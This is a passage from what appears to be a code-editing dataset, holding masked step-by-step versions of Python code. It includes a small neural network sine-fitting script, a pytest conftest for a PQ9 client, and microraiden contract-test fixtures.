0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import numpy as np
import pickle as p
from mpl_toolkits.mplot3d import axes3d
import matplotlib.pyplot as plt
from numpy.random import randn
from neural_network import network
# Fit a small fully-connected network (1-8-8-1) to a scaled sine wave on
# [0, 1], checkpointing after every epoch, then plot target vs. prediction.
net = network([1, 8, 8, 1], filename='./data/x', bias=True)
net.load()

n_samples = 32
inputs = np.linspace(0, 1, n_samples).reshape(-1, 1)   # column vector of x values
targets = (1 + np.sin(10 * inputs)) / 2                # sine squashed into [0, 1]

# Flat copies kept for the red scatter plot drawn after training.
sample_xs = [row[0] for row in inputs]
sample_ys = [row[0] for row in targets]

plt.plot(inputs, targets)

cost = 1
step = 0
for step in range(1001):
    cost = net.retarded_training(inputs, targets)
    print(step, cost)
    net.save()  # checkpoint every epoch

n_dense = 128
plt.plot(sample_xs, sample_ys, 'ro')
grid = np.linspace(0, 1, n_dense)
predictions = [net.forward([xi])[0] for xi in grid]
plt.plot(grid, np.array(predictions))
plt.show()
# for i in range(len(self.z)):
# if i==0:
# yHat = self.forward(x)
# delta = np.multiply(yHat - y, sigmoidPrime(self.z[-1]))
# dJdW = np.dot(self.a[-2].T, delta)
# else:
# delta = np.dot(delta, self.W[-i].T)*sigmoidPrime(self.z[-1-i])
# dJdW = np.dot(self.a[-2-i].T, delta)
# dJ += [dJdW]
# dJ = dJ[::-1]
|
normal
|
{
"blob_id": "cf07344808f2d91d8949cfc4beb9f923926e6851",
"index": 6208,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nnet.load()\n<mask token>\nplt.plot(x, y)\n<mask token>\nfor ii in range(1001):\n c = net.retarded_training(x, y)\n print(ii, c)\n net.save()\n<mask token>\nplt.plot(X, Y, 'ro')\n<mask token>\nfor x in X:\n Y += [net.forward([x])[0]]\nplt.plot(X, np.array(Y))\nplt.show()\n",
"step-3": "<mask token>\nnet = network([1, 8, 8, 1], filename='./data/x', bias=True)\nnet.load()\nn = 32\nx = np.array([[x] for x in np.linspace(0, 1, n)])\ny = (1 + np.sin(10 * x)) / 2\nX = [xx[0] for xx in x]\nY = [yy[0] for yy in y]\nplt.plot(x, y)\nc = 1\nii = 0\nfor ii in range(1001):\n c = net.retarded_training(x, y)\n print(ii, c)\n net.save()\nN = 128\nplt.plot(X, Y, 'ro')\nX = np.linspace(0, 1, N)\nY = []\nfor x in X:\n Y += [net.forward([x])[0]]\nplt.plot(X, np.array(Y))\nplt.show()\n",
"step-4": "import numpy as np\nimport pickle as p\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom numpy.random import randn\nfrom neural_network import network\nnet = network([1, 8, 8, 1], filename='./data/x', bias=True)\nnet.load()\nn = 32\nx = np.array([[x] for x in np.linspace(0, 1, n)])\ny = (1 + np.sin(10 * x)) / 2\nX = [xx[0] for xx in x]\nY = [yy[0] for yy in y]\nplt.plot(x, y)\nc = 1\nii = 0\nfor ii in range(1001):\n c = net.retarded_training(x, y)\n print(ii, c)\n net.save()\nN = 128\nplt.plot(X, Y, 'ro')\nX = np.linspace(0, 1, N)\nY = []\nfor x in X:\n Y += [net.forward([x])[0]]\nplt.plot(X, np.array(Y))\nplt.show()\n",
"step-5": "import numpy as np\nimport pickle as p\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom numpy.random import randn\nfrom neural_network import network\n\nnet = network([1,8,8,1], filename='./data/x', bias=True)\n# net.load_random()\nnet.load()\n\nn = 32\n\nx = np.array([[x] for x in np.linspace(0,1,n)])\ny = (1+np.sin(10*x))/2\n\nX = [xx[0] for xx in x]\nY = [yy[0] for yy in y]\n\nplt.plot(x,y)\n\nc = 1\nii = 0\n\nfor ii in range(1001):\n # c = net.gradient_training(x,y,dw=0.1)\n c = net.retarded_training(x,y)\n print(ii,c)\n net.save()\n # if ii%10==0 and ii!=0:\n # net.shake(x,y,n=10)\n # net.save()\n # # ii+=1\n\nN = 128\n\nplt.plot(X,Y, 'ro')\n\nX = np.linspace(0,1,N)\nY = []\n\nfor x in X:\n Y += [net.forward([x])[0]]\n\nplt.plot(X,np.array(Y))\nplt.show()\n\n\n# for i in range(len(self.z)):\n# if i==0:\n# yHat = self.forward(x)\n# delta = np.multiply(yHat - y, sigmoidPrime(self.z[-1]))\n# dJdW = np.dot(self.a[-2].T, delta)\n# else:\n# delta = np.dot(delta, self.W[-i].T)*sigmoidPrime(self.z[-1-i])\n# dJdW = np.dot(self.a[-2-i].T, delta)\n\n# dJ += [dJdW]\n\n# dJ = dJ[::-1]",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pytest_collection_modifyitems(session, config, items):
print('sono qui', items)
def pytest_ignore_collect(path, config):
print(path)
print('mamma ', config.getoption('--destination'))
return False
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
@pytest.fixture(scope='session')
def pq9_connection():
pq9client = PQ9Client.PQ9Client('localhost', '10000')
pq9client.connect()
yield pq9client
pq9client.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pytest_configure(config):
print('pytest_configure')
def pytest_collection_modifyitems(session, config, items):
print('sono qui', items)
def pytest_ignore_collect(path, config):
print(path)
print('mamma ', config.getoption('--destination'))
return False
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
@pytest.fixture(scope='session')
def pq9_connection():
pq9client = PQ9Client.PQ9Client('localhost', '10000')
pq9client.connect()
yield pq9client
pq9client.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.insert(1, '../Generic')
<|reserved_special_token_0|>
def pytest_configure(config):
print('pytest_configure')
def pytest_collection_modifyitems(session, config, items):
print('sono qui', items)
def pytest_ignore_collect(path, config):
print(path)
print('mamma ', config.getoption('--destination'))
return False
def pytest_addoption(parser):
print('Option ')
parser.addoption('--destination', action='store', help=
'subsystem address', dest='destination')
@pytest.fixture
def destination(request):
print(request.config.getoption('--html'))
return request.config.getoption('--destination')
@pytest.fixture(scope='session')
def pq9_connection():
pq9client = PQ9Client.PQ9Client('localhost', '10000')
pq9client.connect()
yield pq9client
pq9client.close()
<|reserved_special_token_1|>
# content of conftest.py
import pytest
import sys
sys.path.insert(1, '../Generic')
import PQ9Client
def pytest_configure(config):
    """Pytest hook: runs once after command-line options have been parsed.

    Only traces its own execution so plugin load order is visible on stdout.
    """
    print("pytest_configure")
def pytest_collection_modifyitems(session, config, items):
    """Pytest hook: called with the collected test items.

    Currently only logs the item list ("sono qui" = debug trace);
    no filtering or reordering is performed.
    """
    print("sono qui", items)
def pytest_ignore_collect(path, config):
    """Pytest hook: decide whether *path* is skipped during collection.

    Logs the candidate path plus the --destination option value, then
    always returns False so every path is collected.
    """
    print(path)
    destination_opt = config.getoption("--destination")
    print("mamma ", destination_opt)
    return False
def pytest_addoption(parser):
    """Pytest hook: register the --destination command-line option.

    The stored value (dest="destination") is consumed by the
    ``destination`` fixture.
    """
    print("Option ")
    parser.addoption("--destination",
                     action="store",
                     dest="destination",
                     help="subsystem address")
@pytest.fixture
def destination(request):
    """Return the subsystem address passed via --destination.

    Also echoes the --html option value so the report location shows up
    in the test log.
    """
    config = request.config
    print(config.getoption("--html"))
    return config.getoption("--destination")
@pytest.fixture(scope="session")  # one shared connection per test session
def pq9_connection():
    """Yield a connected PQ9 client, closing it at session teardown.

    The close now sits in a ``finally`` block so the socket is released
    even when teardown is interrupted by an exception, instead of only
    on the clean path as before.
    """
    pq9client = PQ9Client.PQ9Client("localhost", "10000")
    pq9client.connect()
    try:
        yield pq9client
    finally:
        pq9client.close()
|
flexible
|
{
"blob_id": "ad88685e3f1cd5e0ddb42a5982a05ff8ee7b8111",
"index": 1586,
"step-1": "<mask token>\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef pytest_collection_modifyitems(session, config, items):\n print('sono qui', items)\n\n\ndef pytest_ignore_collect(path, config):\n print(path)\n print('mamma ', config.getoption('--destination'))\n return False\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n@pytest.fixture(scope='session')\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client('localhost', '10000')\n pq9client.connect()\n yield pq9client\n pq9client.close()\n",
"step-3": "<mask token>\n\n\ndef pytest_configure(config):\n print('pytest_configure')\n\n\ndef pytest_collection_modifyitems(session, config, items):\n print('sono qui', items)\n\n\ndef pytest_ignore_collect(path, config):\n print(path)\n print('mamma ', config.getoption('--destination'))\n return False\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n@pytest.fixture(scope='session')\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client('localhost', '10000')\n pq9client.connect()\n yield pq9client\n pq9client.close()\n",
"step-4": "<mask token>\nsys.path.insert(1, '../Generic')\n<mask token>\n\n\ndef pytest_configure(config):\n print('pytest_configure')\n\n\ndef pytest_collection_modifyitems(session, config, items):\n print('sono qui', items)\n\n\ndef pytest_ignore_collect(path, config):\n print(path)\n print('mamma ', config.getoption('--destination'))\n return False\n\n\ndef pytest_addoption(parser):\n print('Option ')\n parser.addoption('--destination', action='store', help=\n 'subsystem address', dest='destination')\n\n\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption('--html'))\n return request.config.getoption('--destination')\n\n\n@pytest.fixture(scope='session')\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client('localhost', '10000')\n pq9client.connect()\n yield pq9client\n pq9client.close()\n",
"step-5": "# content of conftest.py\nimport pytest\nimport sys\nsys.path.insert(1, '../Generic')\nimport PQ9Client\n \ndef pytest_configure(config):\n print(\"pytest_configure\")\n \ndef pytest_collection_modifyitems(session, config, items):\n print(\"sono qui\", items)\n \ndef pytest_ignore_collect(path, config):\n print(path)\n print(\"mamma \", config.getoption(\"--destination\"))\n return False \n\ndef pytest_addoption(parser):\n print(\"Option \")\n parser.addoption(\n \"--destination\", action=\"store\", help=\"subsystem address\", dest=\"destination\",\n )\n@pytest.fixture\ndef destination(request):\n print(request.config.getoption(\"--html\"))\n #print(request.config.getoption(\"kkk\"))\n return request.config.getoption(\"--destination\")\n\n@pytest.fixture(scope=\"session\") #only 'make' this object once per session.\ndef pq9_connection():\n pq9client = PQ9Client.PQ9Client(\"localhost\",\"10000\")\n pq9client.connect()\n\n yield pq9client\n pq9client.close()\n",
"step-ids": [
2,
5,
6,
7,
9
]
}
|
[
2,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
@pytest.fixture
def test_dir():
return os.path.dirname(os.path.dirname(__file__)) + '/../'
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def deployer_privkey():
return remove_0x_prefix(encode_hex(keys[3]))
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
@pytest.fixture(scope='session')
def channel_manager_abi(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def channel_manager_bytecode(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def token_bytecode(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def kovan_block_time():
return 4
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.fixture
def contracts_relative_path():
return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
return json.load(open(compiled_contracts_path))
@pytest.fixture
def test_dir():
return os.path.dirname(os.path.dirname(__file__)) + '/../'
@pytest.fixture(scope='session')
def use_tester(request):
return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
"""address of a paywall proxy"""
return 'localhost'
@pytest.fixture
def api_endpoint_port():
"""port the paywall proxy listens on"""
return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
return api_endpoint + ':' + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
return '0x' + 'a' * 40
@pytest.fixture
def manager_state_path():
return '/tmp/rmp-state.pkl'
@pytest.fixture(scope='session')
def deployer_privkey():
return remove_0x_prefix(encode_hex(keys[3]))
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
return privkey_to_addr(deployer_privkey)
<|reserved_special_token_0|>
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
abi_file = open(contract_abi_path, 'r')
return json.load(abi_file)
@pytest.fixture(scope='session')
def channel_manager_abi(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def channel_manager_bytecode(contract_abis):
return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def token_abi(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def token_bytecode(contract_abis):
return contract_abis[TOKEN_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def kovan_block_time():
return 4
<|reserved_special_token_1|>
import pytest
from eth_utils import encode_hex, remove_0x_prefix
from ethereum.tester import keys
import os
import json
from microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME
from microraiden.crypto import privkey_to_addr
# Shared pytest fixtures: compiled-contract artifact paths, paywall proxy
# endpoint settings, and session-scoped deployer/ABI data for the test suite.
@pytest.fixture
def contracts_relative_path():
    # Location of the compiled-contracts JSON, relative to test_dir.
    return 'data/contracts.json'
@pytest.fixture
def compiled_contracts_path(test_dir, contracts_relative_path):
    # Absolute path of the compiled-contracts JSON.
    return os.path.join(test_dir, contracts_relative_path)
@pytest.fixture
def compiled_contracts(compiled_contracts_path):
    # Parsed contents of the compiled-contracts JSON.
    # NOTE(review): the file handle opened here is never closed explicitly.
    return json.load(open(compiled_contracts_path))
@pytest.fixture
def test_dir():
    # Directory two levels above this file, plus "/../" (i.e. three levels up).
    return os.path.dirname(os.path.dirname(__file__)) + "/../"
@pytest.fixture(scope='session')
def use_tester(request):
    # Value of the 'use_tester' command-line option (registered elsewhere).
    return request.config.getoption('use_tester')
@pytest.fixture
def api_endpoint():
    """address of a paywall proxy"""
    return 'localhost'
@pytest.fixture
def api_endpoint_port():
    """port the paywall proxy listens on"""
    return 5000
@pytest.fixture
def api_endpoint_address(api_endpoint, api_endpoint_port):
    # "host:port" string combining the two fixtures above.
    return api_endpoint + ":" + str(api_endpoint_port)
@pytest.fixture
def init_contract_address():
    # Placeholder 40-hex-digit address used where a real one is not needed.
    return "0x" + "a" * 40
@pytest.fixture
def manager_state_path():
    # Scratch file for persisted channel-manager state.
    return '/tmp/rmp-state.pkl'
@pytest.fixture(scope='session')
def deployer_privkey():
    # Hex private key (0x prefix stripped) of tester account #3.
    return remove_0x_prefix(encode_hex(keys[3]))
@pytest.fixture(scope='session')
def deployer_address(deployer_privkey):
    # Address derived from the deployer private key.
    return privkey_to_addr(deployer_privkey)
@pytest.fixture(scope='session')
def contract_abi_path():
    # Session-scoped path to the same contracts JSON, resolved independently
    # of the function-scoped test_dir fixture.
    return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json')
@pytest.fixture(scope='session')
def contract_abis(contract_abi_path):
    # Parsed ABI/bytecode bundle for all compiled contracts.
    abi_file = open(contract_abi_path, 'r')
    return json.load(abi_file)
@pytest.fixture(scope='session')
def channel_manager_abi(contract_abis):
    # ABI of the channel-manager contract.
    return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def channel_manager_bytecode(contract_abis):
    # Deployment bytecode of the channel-manager contract.
    return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def token_abi(contract_abis):
    # ABI of the token contract.
    return contract_abis[TOKEN_ABI_NAME]['abi']
@pytest.fixture(scope='session')
def token_bytecode(contract_abis):
    # Deployment bytecode of the token contract.
    return contract_abis[TOKEN_ABI_NAME]['bytecode']
@pytest.fixture(scope='session')
def kovan_block_time():
    # Approximate Kovan testnet block interval, in seconds.
    return 4
|
flexible
|
{
"blob_id": "438fe1ccf265706e202d7cc6044e57590f29801f",
"index": 9375,
"step-1": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n@pytest.fixture\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef 
kovan_block_time():\n return 4\n",
"step-4": "<mask token>\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n@pytest.fixture\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n@pytest.fixture\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\n@pytest.fixture(scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef token_bytecode(contract_abis):\n return 
contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef kovan_block_time():\n return 4\n",
"step-5": "import pytest\nfrom eth_utils import encode_hex, remove_0x_prefix\nfrom ethereum.tester import keys\n\nimport os\nimport json\nfrom microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME\nfrom microraiden.crypto import privkey_to_addr\n\n\n@pytest.fixture\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\n@pytest.fixture\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\n@pytest.fixture\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n@pytest.fixture\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + \"/../\"\n\n\n@pytest.fixture(scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\n@pytest.fixture\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\n@pytest.fixture\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\n@pytest.fixture\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + \":\" + str(api_endpoint_port)\n\n\n@pytest.fixture\ndef init_contract_address():\n return \"0x\" + \"a\" * 40\n\n\n@pytest.fixture\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\n@pytest.fixture(scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n@pytest.fixture(scope='session')\ndef contract_abi_path():\n return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json')\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_abi(contract_abis):\n return 
contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef kovan_block_time():\n return 4\n",
"step-ids": [
10,
11,
17,
18,
